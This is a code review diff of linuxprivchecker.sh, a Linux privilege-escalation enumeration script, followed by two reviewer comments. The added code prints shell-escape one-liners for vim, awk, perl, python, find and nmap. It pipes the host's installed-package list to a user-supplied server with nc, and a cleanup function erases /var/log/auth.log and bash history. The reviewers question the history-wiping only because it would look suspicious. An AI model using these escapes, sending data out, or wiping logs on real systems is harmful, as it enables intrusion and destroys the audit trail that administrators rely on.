linuxprivchecker.sh

```diff
@@ -2,251 +2,279 @@
+  cmdRESPONSE "if [ -x "$(command -v vim)" ]; then echo -ne \"vim-->\t:!bash\n\" | sed 's|^|    |'; echo -ne "vim-->\t:set shell=/bin/bash:shell\n" | sed 's|^|    |'; fi";
+  cmdRESPONSE "if [ -x "$(command -v awk)" ]; then echo -ne \"awk-->\tawk 'BEGIN {system(\"/bin/bash\")}'\n\" | sed 's|^|    |'; fi";
+  cmdRESPONSE "if [ -x "$(command -v perl)" ]; then echo -ne \"perl-->\tperl -e 'exec \"/bin/bash\";'\n\" | sed 's|^|    |'; fi";
+  cmdRESPONSE "if [ -x "$(command -v python)" ]; then echo -ne \"python-->\tpython -c '__import__(\"os\").system(\"/bin/bash\")'\n\" | sed 's|^|    |'; fi";
+  cmdRESPONSE "if [ -x "$(command -v find)" ]; then echo -ne \"find->\tfind / -exec /usr/bin/awk 'BEGIN {system(\"/bin/bash\")}' \\;\n\" | sed 's|^|    |'; fi";
+  cmdRESPONSE "if [ -x "$(command -v nmap)" ]; then echo -ne \"nmap-->\t--interactive\n\" | sed 's|^|    |'; fi";
+}
 
-if [ $PKGMNGR -eq 1 ]; then
-    	formatCommand "dpkg -l | grep -iE '${EXTDGREP}'"
-elif [ $PKGMNGR -eq 2 ]; then
-	formatCommand "dnf -qa | grep -iE '${EXTDGREP}'"
-elif [ $PKGMNGR -eq 3 ]; then
-	formatCommand "rpm -qa | grep -iE '${EXTDGREP}'"
-fi
+searchEXPLOITS(){
+  systemAREA="Search for Exploits";
+  systemAREAtitle;
+
+  echo -e "[*] FINDING RELEVANT PRIVILEGE ESCALATION EXPLOITS..."
+  read -p "[?] Would you like to search for possible exploits? [y/N] " connectToServer
+
+  if [[ $connectToServer = y* ]]
+  then
+	   read -p "[?] What is the address of the server? " server
+	    read -p "[?] What port is the server using? " port
+	     echo -ne "\n\n"
+	      echo -e "[ ] Searching on $server:$port"
+	       printf "%*s\n" "80" | tr " " "*"
+	        dpkg -l | tail -n +6 | awk '{print $2, $3} END {print ""}' | nc $server $port
+	         printf "%*s\n" "80" | tr " " "*"
+  fi
+}
 
-echo -ne "\n${SECTION_LINE}\n"
-echo -e "[*] ENUMERATING INSTALLED LANGUAGES/TOOLS FOR SPLOIT BUILDING..."
+cleanUP(){
+  systemAREA="Clean Up";
+  systemAREAtitle;
 
-echo -e "\n[+] Installed Tools"
-formatCommand "which awk perl python ruby gcc cc vi vim nmap find netcat nc wget tftp ftp 2>/dev/null"
+  systemNAME="Clearing /var/log/auth.log";
+  cmdRESPONSE "echo " " > /var/log/auth.log";
 
-echo -e "\n[+] Related Shell Escape Sequences"
-if [ -x "$(command -v vi)" ]; then
-	formatCommand "echo -ne \"vi-->\t:!bash\n\""
-	formatCommand "echo -ne \"vi-->\t:set shell=/bin/bash:shell\n\""
-fi
+  systemNAME="Clearning bash_history";
+  cmdRESPONSE "echo " " > ~/.bash_history";
 
-if [ -x "$(command -v vim)" ]; then
-	echo -ne "vim-->\t:!bash\n" | sed 's|^|    |'
-	echo -ne "vim-->\t:set shell=/bin/bash:shell\n" | sed 's|^|    |'
-fi
+  systemNAME="Clearing Current Session History";
+  cmdRESPONSE "history -c";
 
-if [ -x "$(command -v awk)" ]; then
-	echo -ne "awk-->\tawk 'BEGIN {system(\"/bin/bash\")}'\n" | sed 's|^|    |'
-fi
+  systemNAME="Setting history max lines to 0";
+  cmdRESPONSE "export HISTFILESIZE=0";
```

Comment:
It is probably not the best Idea to clear the history. I know that personally if I logged into one of my boxes and there was no history, I would start to be suspicious of what could have happened. In my opinion you should remove everything in the cleanup except for lines 260 and 261 which should move to the beginning somewhere. Also the exports that you are doing here are probably useless unless people are sourcing this file. feel free to argue your point.

Reply:
Also agree.